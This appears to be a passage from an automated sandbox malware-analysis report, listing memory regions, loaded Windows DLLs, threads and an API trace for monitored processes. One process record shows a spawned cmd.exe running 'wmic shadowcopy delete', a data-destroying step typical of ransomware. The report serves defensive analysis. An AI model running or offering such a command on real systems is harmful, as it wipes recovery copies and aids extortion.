	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000001d48b0b0000"
	        filename = ""

Region:
	              id = 480
	        start_va = 0x7ff958280000
	          end_va = 0x7ff9583c2fff
	       monitored = 0
	     entry_point = 0x7ff9582a8210
	     region_type = mapped_file
	            name = "ole32.dll"
	        filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll")

Region:
	              id = 484
	        start_va = 0x7ff959330000
	          end_va = 0x7ff95938afff
	       monitored = 0
	     entry_point = 0x7ff9593438b0
	     region_type = mapped_file
	            name = "sechost.dll"
	        filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll")

Region:
	              id = 485
	        start_va = 0x7ff958820000
	          end_va = 0x7ff95885afff
	       monitored = 0
	     entry_point = 0x7ff9588212f0
	     region_type = mapped_file
	            name = "imm32.dll"
	        filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll")

Region:
	              id = 486
	        start_va = 0x7ff958ba0000
	          end_va = 0x7ff958c60fff
	       monitored = 0
	     entry_point = 0x7ff958bc0da0
	     region_type = mapped_file
	            name = "oleaut32.dll"
	        filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll")

Region:
	              id = 487
	        start_va = 0x7ff9559b0000
	          end_va = 0x7ff955b35fff
	       monitored = 0
	     entry_point = 0x7ff9559fd700
	     region_type = mapped_file
	            name = "propsys.dll"
	        filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll")

Region:
	              id = 493
	        start_va = 0x1d48b0c0000
	          end_va = 0x1d48b0c0fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000001d48b0c0000"
	        filename = ""

Region:
	              id = 494
	        start_va = 0x1d48b0d0000
	          end_va = 0x1d48b0d0fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000001d48b0d0000"
	        filename = ""

Region:
	              id = 495
	        start_va = 0x1d48b2d0000
	          end_va = 0x1d48b457fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x000001d48b2d0000"
	        filename = ""

Region:
	              id = 496
	        start_va = 0x1d48b460000
	          end_va = 0x1d48b5e0fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x000001d48b460000"
	        filename = ""

Region:
	              id = 497
	        start_va = 0x1d48b5f0000
	          end_va = 0x1d48c9effff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x000001d48b5f0000"
	        filename = ""

Region:
	              id = 498
	        start_va = 0x1d48c9f0000
	          end_va = 0x1d48cadffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000001d48c9f0000"
	        filename = ""

Region:
	              id = 521
	        start_va = 0x6102e90000
	          end_va = 0x6102ecffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000006102e90000"
	        filename = ""

Region:
	              id = 522
	        start_va = 0x7ff959390000
	          end_va = 0x7ff95a8eefff
	       monitored = 0
	     entry_point = 0x7ff9594f11f0
	     region_type = mapped_file
	            name = "shell32.dll"
	        filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll")

Region:
	              id = 535
	        start_va = 0x7ff958020000
	          end_va = 0x7ff958062fff
	       monitored = 0
	     entry_point = 0x7ff958034b50
	     region_type = mapped_file
	            name = "cfgmgr32.dll"
	        filename = "\\Windows\\System32\\cfgmgr32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll")

Region:
	              id = 536
	        start_va = 0x7ff957800000
	          end_va = 0x7ff957e43fff
	       monitored = 0
	     entry_point = 0x7ff9579c64b0
	     region_type = mapped_file
	            name = "windows.storage.dll"
	        filename = "\\Windows\\System32\\windows.storage.dll" (normalized: "c:\\windows\\system32\\windows.storage.dll")

Region:
	              id = 537
	        start_va = 0x7ff9590c0000
	          end_va = 0x7ff959166fff
	       monitored = 0
	     entry_point = 0x7ff9590d58d0
	     region_type = mapped_file
	            name = "advapi32.dll"
	        filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll")

Region:
	              id = 542
	        start_va = 0x7ff9587b0000
	          end_va = 0x7ff958801fff
	       monitored = 0
	     entry_point = 0x7ff9587bf530
	     region_type = mapped_file
	            name = "shlwapi.dll"
	        filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll")

Region:
	              id = 543
	        start_va = 0x7ff9574b0000
	          end_va = 0x7ff9574befff
	       monitored = 0
	     entry_point = 0x7ff9574b3210
	     region_type = mapped_file
	            name = "kernel.appcore.dll"
	        filename = "\\Windows\\System32\\kernel.appcore.dll" (normalized: "c:\\windows\\system32\\kernel.appcore.dll")

Region:
	              id = 544
	        start_va = 0x7ff958070000
	          end_va = 0x7ff958124fff
	       monitored = 0
	     entry_point = 0x7ff9580b22e0
	     region_type = mapped_file
	            name = "shcore.dll"
	        filename = "\\Windows\\System32\\SHCore.dll" (normalized: "c:\\windows\\system32\\shcore.dll")

Region:
	              id = 545
	        start_va = 0x7ff9574d0000
	          end_va = 0x7ff95751afff
	       monitored = 0
	     entry_point = 0x7ff9574d35f0
	     region_type = mapped_file
	            name = "powrprof.dll"
	        filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll")

Region:
	              id = 546
	        start_va = 0x7ff957490000
	          end_va = 0x7ff9574a3fff
	       monitored = 0
	     entry_point = 0x7ff9574952e0
	     region_type = mapped_file
	            name = "profapi.dll"
	        filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll")

Region:
	              id = 569
	        start_va = 0x7ff955e10000
	          end_va = 0x7ff955ea5fff
	       monitored = 0
	     entry_point = 0x7ff955e35570
	     region_type = mapped_file
	            name = "uxtheme.dll"
	        filename = "\\Windows\\System32\\uxtheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll")

Region:
	              id = 570
	        start_va = 0x1d48b230000
	          end_va = 0x1d48b2affff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000001d48b230000"
	        filename = ""

Region:
	              id = 571
	        start_va = 0x1d48b2c0000
	          end_va = 0x1d48b2cffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000001d48b2c0000"
	        filename = ""

Region:
	              id = 593
	        start_va = 0x1d48cae0000
	          end_va = 0x1d48ce16fff
	       monitored = 0
	     entry_point = 0x0
	     region_type = mapped_file
	            name = "sortdefault.nls"
	        filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls")

Region:
	              id = 611
	        start_va = 0x1d48b0e0000
	          end_va = 0x1d48b100fff
	       monitored = 0
	     entry_point = 0x0
	     region_type = mapped_file
	            name = "cmd.exe.mui"
	        filename = "\\Windows\\System32\\en-US\\cmd.exe.mui" (normalized: "c:\\windows\\system32\\en-us\\cmd.exe.mui")

Region:
	              id = 612
	        start_va = 0x1d48b230000
	          end_va = 0x1d48b289fff
	       monitored = 1
	     entry_point = 0x1d48b2453f0
	     region_type = mapped_file
	            name = "cmd.exe"
	        filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")

Region:
	              id = 613
	        start_va = 0x1d48b2a0000
	          end_va = 0x1d48b2affff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000001d48b2a0000"
	        filename = ""

Region:
	              id = 640
	        start_va = 0x1d48ce20000
	          end_va = 0x1d48d039fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000001d48ce20000"
	        filename = ""

Region:
	              id = 641
	        start_va = 0x1d48d040000
	          end_va = 0x1d48d257fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000001d48d040000"
	        filename = ""

Region:
	              id = 659
	        start_va = 0x1d48d260000
	          end_va = 0x1d48d370fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000001d48d260000"
	        filename = ""

Region:
	              id = 660
	        start_va = 0x1d48d380000
	          end_va = 0x1d48d590fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000001d48d380000"
	        filename = ""

Region:
	              id = 661
	        start_va = 0x1d48d5a0000
	          end_va = 0x1d48d6aefff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000001d48d5a0000"
	        filename = ""

Region:
	              id = 716
	        start_va = 0x6102ed0000
	          end_va = 0x6102f0ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000006102ed0000"
	        filename = ""

Region:
	              id = 717
	        start_va = 0x7ff9589e0000
	          end_va = 0x7ff958b39fff
	       monitored = 0
	     entry_point = 0x7ff958a238e0
	     region_type = mapped_file
	            name = "msctf.dll"
	        filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll")

Region:
	              id = 718
	        start_va = 0x1d48b0e0000
	          end_va = 0x1d48b0e0fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x000001d48b0e0000"
	        filename = ""

Region:
	              id = 719
	        start_va = 0x1d48c9f0000
	          end_va = 0x1d48caabfff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x000001d48c9f0000"
	        filename = ""

Region:
	              id = 720
	        start_va = 0x1d48cad0000
	          end_va = 0x1d48cadffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000001d48cad0000"
	        filename = ""

Region:
	              id = 721
	        start_va = 0x1d48b0e0000
	          end_va = 0x1d48b0e3fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x000001d48b0e0000"
	        filename = ""

Region:
	              id = 722
	        start_va = 0x7ff955420000
	          end_va = 0x7ff955441fff
	       monitored = 0
	     entry_point = 0x7ff955421a40
	     region_type = mapped_file
	            name = "dwmapi.dll"
	        filename = "\\Windows\\System32\\dwmapi.dll" (normalized: "c:\\windows\\system32\\dwmapi.dll")

Region:
	              id = 738
	        start_va = 0x7ff955ba0000
	          end_va = 0x7ff955bb2fff
	       monitored = 0
	     entry_point = 0x7ff955ba2760
	     region_type = mapped_file
	            name = "wtsapi32.dll"
	        filename = "\\Windows\\System32\\wtsapi32.dll" (normalized: "c:\\windows\\system32\\wtsapi32.dll")

Region:
	              id = 739
	        start_va = 0x7ff9572a0000
	          end_va = 0x7ff9572f5fff
	       monitored = 0
	     entry_point = 0x7ff9572b0bf0
	     region_type = mapped_file
	            name = "winsta.dll"
	        filename = "\\Windows\\System32\\winsta.dll" (normalized: "c:\\windows\\system32\\winsta.dll")

Region:
	              id = 740
	        start_va = 0x1d48b0f0000
	          end_va = 0x1d48b0f6fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000001d48b0f0000"
	        filename = ""

Region:
	              id = 741
	        start_va = 0x1d48b100000
	          end_va = 0x1d48b100fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x000001d48b100000"
	        filename = ""

Region:
	              id = 742
	        start_va = 0x1d48b110000
	          end_va = 0x1d48b110fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x000001d48b110000"
	        filename = ""

Region:
	              id = 743
	        start_va = 0x1d48b120000
	          end_va = 0x1d48b124fff
	       monitored = 0
	     entry_point = 0x0
	     region_type = mapped_file
	            name = "user32.dll.mui"
	        filename = "\\Windows\\System32\\en-US\\user32.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\user32.dll.mui")

Region:
	              id = 774
	        start_va = 0x1d48b230000
	          end_va = 0x1d48b230fff
	       monitored = 0
	     entry_point = 0x0
	     region_type = mapped_file
	            name = "conhostv2.dll.mui"
	        filename = "\\Windows\\System32\\en-US\\ConhostV2.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\conhostv2.dll.mui")

Region:
	              id = 787
	        start_va = 0x1d48b240000
	          end_va = 0x1d48b241fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x000001d48b240000"
	        filename = ""

Region:
	              id = 788
	        start_va = 0x7ff94c7c0000
	          end_va = 0x7ff94ca33fff
	       monitored = 0
	     entry_point = 0x7ff94c830400
	     region_type = mapped_file
	            name = "comctl32.dll"
	        filename = "\\Windows\\WinSxS\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10586.0_none_8c15ae12515e1c22\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10586.0_none_8c15ae12515e1c22\\comctl32.dll")

Region:
	              id = 789
	        start_va = 0x1d48b250000
	          end_va = 0x1d48b250fff
	       monitored = 0
	     entry_point = 0x0
	     region_type = mapped_file
	            name = "windowsshell.manifest"
	        filename = "\\Windows\\WindowsShell.Manifest" (normalized: "c:\\windows\\windowsshell.manifest")

Region:
	              id = 790
	        start_va = 0x1d48b260000
	          end_va = 0x1d48b261fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x000001d48b260000"
	        filename = ""


Thread:
	id = 12
	os_tid = 0x12f0


Thread:
	id = 13
	os_tid = 0xda8


Thread:
	id = 17
	os_tid = 0x12c4


Thread:
	id = 27
	os_tid = 0xe14


Process:
	id = "4"
	image_name = "cmd.exe"
	filename = "c:\\windows\\syswow64\\cmd.exe"
	page_root = "0x34421000"
	os_pid = "0x12ec"
	os_integrity_level = "0x3000"
	os_privileges = "0x60800000"
	monitor_reason = "child_process"
	parent_id = "1"
	os_parent_pid = "0x117c"
	cmd_line = "\"C:\\Windows\\System32\\cmd.exe\" /C \x09wmic shadowcopy delete"
	cur_dir = "C:\\Users\\RDhJ0CNFevzX\\Desktop\\"
	os_username = "XC64ZB\\RDhJ0CNFevzX"
	bitness = "32"
	os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f1a9" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]

Region:
	              id = 458
	        start_va = 0x10000
	          end_va = 0x2ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000010000"
	        filename = ""

Region:
	              id = 459
	        start_va = 0x30000
	          end_va = 0x44fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000000030000"
	        filename = ""

Region:
	              id = 460
	        start_va = 0x50000
	          end_va = 0x8ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000050000"
	        filename = ""

Region:
	              id = 461
	        start_va = 0x90000
	          end_va = 0x18ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000090000"
	        filename = ""

Region:
	              id = 462
	        start_va = 0x190000
	          end_va = 0x193fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000000190000"
	        filename = ""

Region:
	              id = 463
	        start_va = 0x1a0000
	          end_va = 0x1a0fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000001a0000"
	        filename = ""

Region:
	              id = 464
	        start_va = 0x1b0000
	          end_va = 0x1b1fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000000001b0000"
	        filename = ""

Region:
	              id = 465
	        start_va = 0x2f0000
	          end_va = 0x341fff
	       monitored = 1
	     entry_point = 0x304fd0
	     region_type = mapped_file
	            name = "cmd.exe"
	        filename = "\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe")

Region:
	              id = 466
	        start_va = 0x350000
	          end_va = 0x434ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000000350000"
	        filename = ""

Region:
	              id = 467
	        start_va = 0x4350000
	          end_va = 0x4351fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000004350000"
	        filename = ""

Region:
	              id = 468
	        start_va = 0x4400000
	          end_va = 0x45fffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000004400000"
	        filename = ""

Region:
	              id = 469
	        start_va = 0x77040000
	          end_va = 0x771bafff
	       monitored = 0
	     entry_point = 0x0
	     region_type = mapped_file
	            name = "ntdll.dll"
	        filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll")

Region:
	              id = 470
	        start_va = 0x7e500000
	          end_va = 0x7e522fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x000000007e500000"
	        filename = ""

Region:
	              id = 471
	        start_va = 0x7ffe0000
	          end_va = 0x7ffeffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000000007ffe0000"
	        filename = ""

Region:
	              id = 472
	        start_va = 0x7fff0000
	          end_va = 0x7df95ae6ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000000007fff0000"
	        filename = ""

Region:
	              id = 473
	        start_va = 0x7df95ae70000
	          end_va = 0x7ff95ae6ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00007df95ae70000"
	        filename = ""

Region:
	              id = 474
	        start_va = 0x7ff95ae70000
	          end_va = 0x7ff95b030fff
	       monitored = 0
	     entry_point = 0x0
	     region_type = mapped_file
	            name = "ntdll.dll"
	        filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")

Region:
	              id = 475
	        start_va = 0x7ff95b031000
	          end_va = 0x7ffffffeffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00007ff95b031000"
	        filename = ""

Region:
	              id = 477
	        start_va = 0x1c0000
	          end_va = 0x1cffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000000001c0000"
	        filename = ""

Region:
	              id = 478
	        start_va = 0x586b0000
	          end_va = 0x586fffff
	       monitored = 0
	     entry_point = 0x586c8180
	     region_type = mapped_file
	            name = "wow64.dll"
	        filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll")

Region:
	              id = 481
	        start_va = 0x58630000
	          end_va = 0x586a9fff
	       monitored = 0
	     entry_point = 0x58643290
	     region_type = mapped_file
	            name = "wow64win.dll"
	        filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll")

Region:
	              id = 482
	        start_va = 0x76d90000
	          end_va = 0x76e6ffff
	       monitored = 0
	     entry_point = 0x76da3980
	     region_type = mapped_file
	            name = "kernel32.dll"
	        filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll")

Region:
	              id = 483
	        start_va = 0x58700000
	          end_va = 0x58707fff
	       monitored = 0
	     entry_point = 0x587017c0
	     region_type = mapped_file
	            name = "wow64cpu.dll"
	        filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll")

Region:
	              id = 488
	        start_va = 0x4600000
	          end_va = 0x47effff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000004600000"
	        filename = ""

Region:
	              id = 489
	        start_va = 0x76d90000
	          end_va = 0x76e6ffff
	       monitored = 0
	     entry_point = 0x76da3980
	     region_type = mapped_file
	            name = "kernel32.dll"
	        filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll")

Region:
	              id = 490
	        start_va = 0x74590000
	          end_va = 0x7470dfff
	       monitored = 0
	     entry_point = 0x74641b90
	     region_type = mapped_file
	            name = "kernelbase.dll"
	        filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll")

Region:
	              id = 491
	        start_va = 0x10000
	          end_va = 0x1ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000000010000"
	        filename = ""

Region:
	              id = 492
	        start_va = 0x7e400000
	          end_va = 0x7e4fffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x000000007e400000"
	        filename = ""

Region:
	              id = 962
	        start_va = 0x1d0000
	          end_va = 0x28dfff
	       monitored = 0
	     entry_point = 0x0
	     region_type = mapped_file
	            name = "locale.nls"
	        filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls")

Region:
	              id = 963
	        start_va = 0x76820000
	          end_va = 0x768ddfff
	       monitored = 0
	     entry_point = 0x76855630
	     region_type = mapped_file
	            name = "msvcrt.dll"
	        filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll")

Region:
	              id = 964
	        start_va = 0x290000
	          end_va = 0x2cffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000290000"
	        filename = ""

Region:
	              id = 965
	        start_va = 0x47f0000
	          end_va = 0x48effff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000000047f0000"
	        filename = ""

Region:
	              id = 966
	        start_va = 0x48f0000
	          end_va = 0x4aeffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000000048f0000"
	        filename = ""

Region:
	              id = 967
	        start_va = 0x4350000
	          end_va = 0x4353fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000004350000"
	        filename = ""

Region:
	              id = 1258
	        start_va = 0x4360000
	          end_va = 0x4363fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000004360000"
	        filename = ""

Region:
	              id = 1375
	        start_va = 0x4af0000
	          end_va = 0x4e26fff
	       monitored = 0
	     entry_point = 0x0
	     region_type = mapped_file
	            name = "sortdefault.nls"
	        filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls")


Thread:
	id = 14
	os_tid = 0x12e4

	[0233.796] GetProcAddress (hModule=0x76d90000, lpProcName="SetConsoleInputExeNameW") returned 0x746ab440
	[0233.796] GetProcessHeap () returned 0x46f0000
	[0233.797] RtlAllocateHeap (HeapHandle=0x46f0000, Flags=0x8, Size=0x400a) returned 0x46fc3c0
	[0233.797] GetProcessHeap () returned 0x46f0000
	[0233.797] RtlFreeHeap (HeapHandle=0x46f0000, Flags=0x0, BaseAddress=0x46fc3c0) returned 1
	[0233.799] _wcsicmp (_String1="wmic", _String2=")") returned 78
	[0233.799] _wcsicmp (_String1="FOR", _String2="wmic") returned -17
	[0233.799] _wcsicmp (_String1="FOR/?", _String2="wmic") returned -17
	[0233.799] _wcsicmp (_String1="IF", _String2="wmic") returned -14
	[0233.799] _wcsicmp (_String1="IF/?", _String2="wmic") returned -14
	[0233.799] _wcsicmp (_String1="REM", _String2="wmic") returned -5
	[0233.799] _wcsicmp (_String1="REM/?", _String2="wmic") returned -5
	[0233.800] GetProcessHeap () returned 0x46f0000
	[0233.800] RtlAllocateHeap (HeapHandle=0x46f0000, Flags=0x8, Size=0x58) returned 0x46f8f98
	[0233.800] GetProcessHeap () returned 0x46f0000
	[0233.800] RtlAllocateHeap (HeapHandle=0x46f0000, Flags=0x8, Size=0x12) returned 0x46f7718
	[0233.801] GetProcessHeap () returned 0x46f0000
	[0233.801] RtlAllocateHeap (HeapHandle=0x46f0000, Flags=0x8, Size=0x2e) returned 0x46f8ff8
	[0233.803] GetConsoleTitleW (in: lpConsoleTitle=0x18f6d8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\System32\\cmd.exe") returned 0x1b
	[0234.290] _wcsicmp (_String1="wmic", _String2="DIR") returned 19
	[0234.291] _wcsicmp (_String1="wmic", _String2="ERASE") returned 18
	[0234.291] _wcsicmp (_String1="wmic", _String2="DEL") returned 19
	[0234.291] _wcsicmp (_String1="wmic", _String2="TYPE") returned 3
	[0234.291] _wcsicmp (_String1="wmic", _String2="COPY") returned 20
	[0234.291] _wcsicmp (_String1="wmic", _String2="CD") returned 20
	[0234.291] _wcsicmp (_String1="wmic", _String2="CHDIR") returned 20
	[0234.291] _wcsicmp (_String1="wmic", _String2="RENAME") returned 5
	[0234.291] _wcsicmp (_String1="wmic", _String2="REN") returned 5
	[0234.291] _wcsicmp (_String1="wmic", _String2="ECHO") returned 18
	[0234.291] _wcsicmp (_String1="wmic", _String2="SET") returned 4
	[0234.291] _wcsicmp (_String1="wmic", _String2="PAUSE") returned 7
	[0234.291] _wcsicmp (_String1="wmic", _String2="DATE") returned 19
	[0234.291] _wcsicmp (_String1="wmic", _String2="TIME") returned 3
	[0234.292] _wcsicmp (_String1="wmic", _String2="PROMPT") returned 7
	[0234.292] _wcsicmp (_String1="wmic", _String2="MD") returned 10
	[0234.292] _wcsicmp (_String1="wmic", _String2="MKDIR") returned 10
	[0234.292] _wcsicmp (_String1="wmic", _String2="RD") returned 5
	[0234.292] _wcsicmp (_String1="wmic", _String2="RMDIR") returned 5
	[0234.292] _wcsicmp (_String1="wmic", _String2="PATH") returned 7
	[0234.292] _wcsicmp (_String1="wmic", _String2="GOTO") returned 16
	[0234.292] _wcsicmp (_String1="wmic", _String2="SHIFT") returned 4
	[0234.292] _wcsicmp (_String1="wmic", _String2="CLS") returned 20
	[0234.292] _wcsicmp (_String1="wmic", _String2="CALL") returned 20
	[0234.292] _wcsicmp (_String1="wmic", _String2="VERIFY") returned 1
	[0234.292] _wcsicmp (_String1="wmic", _String2="VER") returned 1
	[0234.292] _wcsicmp (_String1="wmic", _String2="VOL") returned 1
	[0234.292] _wcsicmp (_String1="wmic", _String2="EXIT") returned 18
	[0234.292] _wcsicmp (_String1="wmic", _String2="SETLOCAL") returned 4
	[0234.293] _wcsicmp (_String1="wmic", _String2="ENDLOCAL") returned 18
	[0234.293] _wcsicmp (_String1="wmic", _String2="TITLE") returned 3
	[0234.293] _wcsicmp (_String1="wmic", _String2="START") returned 4
	[0234.293] _wcsicmp (_String1="wmic", _String2="DPATH") returned 19
	[0234.293] _wcsicmp (_String1="wmic", _String2="KEYS") returned 12
	[0234.293] _wcsicmp (_String1="wmic", _String2="MOVE") returned 10
	[0234.293] _wcsicmp (_String1="wmic", _String2="PUSHD") returned 7
	[0234.293] _wcsicmp (_String1="wmic", _String2="POPD") returned 7
	[0234.293] _wcsicmp (_String1="wmic", _String2="ASSOC") returned 22
	[0234.293] _wcsicmp (_String1="wmic", _String2="FTYPE") returned 17
	[0234.293] _wcsicmp (_String1="wmic", _String2="BREAK") returned 21
	[0234.293] _wcsicmp (_String1="wmic", _String2="COLOR") returned 20
	[0234.293] _wcsicmp (_String1="wmic", _String2="MKLINK") returned 10
	[0234.294] _wcsicmp (_String1="wmic", _String2="DIR") returned 19
	[0234.294] _wcsicmp (_String1="wmic", _String2="ERASE") returned 18
	[0234.294] _wcsicmp (_String1="wmic", _String2="DEL") returned 19
	[0234.294] _wcsicmp (_String1="wmic", _String2="TYPE") returned 3
	[0234.294] _wcsicmp (_String1="wmic", _String2="COPY") returned 20
	[0234.294] _wcsicmp (_String1="wmic", _String2="CD") returned 20
	[0234.294] _wcsicmp (_String1="wmic", _String2="CHDIR") returned 20
	[0234.294] _wcsicmp (_String1="wmic", _String2="RENAME") returned 5
	[0234.294] _wcsicmp (_String1="wmic", _String2="REN") returned 5
	[0234.294] _wcsicmp (_String1="wmic", _String2="ECHO") returned 18
	[0234.294] _wcsicmp (_String1="wmic", _String2="SET") returned 4
	[0234.294] _wcsicmp (_String1="wmic", _String2="PAUSE") returned 7
	[0234.294] _wcsicmp (_String1="wmic", _String2="DATE") returned 19
	[0234.295] _wcsicmp (_String1="wmic", _String2="TIME") returned 3
	[0234.295] _wcsicmp (_String1="wmic", _String2="PROMPT") returned 7
	[0234.295] _wcsicmp (_String1="wmic", _String2="MD") returned 10
	[0234.295] _wcsicmp (_String1="wmic", _String2="MKDIR") returned 10
	[0234.295] _wcsicmp (_String1="wmic", _String2="RD") returned 5
	[0234.295] _wcsicmp (_String1="wmic", _String2="RMDIR") returned 5
	[0234.295] _wcsicmp (_String1="wmic", _String2="PATH") returned 7
	[0234.295] _wcsicmp (_String1="wmic", _String2="GOTO") returned 16
	[0234.295] _wcsicmp (_String1="wmic", _String2="SHIFT") returned 4
	[0234.295] _wcsicmp (_String1="wmic", _String2="CLS") returned 20
	[0234.295] _wcsicmp (_String1="wmic", _String2="CALL") returned 20
	[0234.295] _wcsicmp (_String1="wmic", _String2="VERIFY") returned 1
	[0234.296] _wcsicmp (_String1="wmic", _String2="VER") returned 1
	[0234.296] _wcsicmp (_String1="wmic", _String2="VOL") returned 1
	[0234.296] _wcsicmp (_String1="wmic", _String2="EXIT") returned 18
	[0234.296] _wcsicmp (_String1="wmic", _String2="SETLOCAL") returned 4
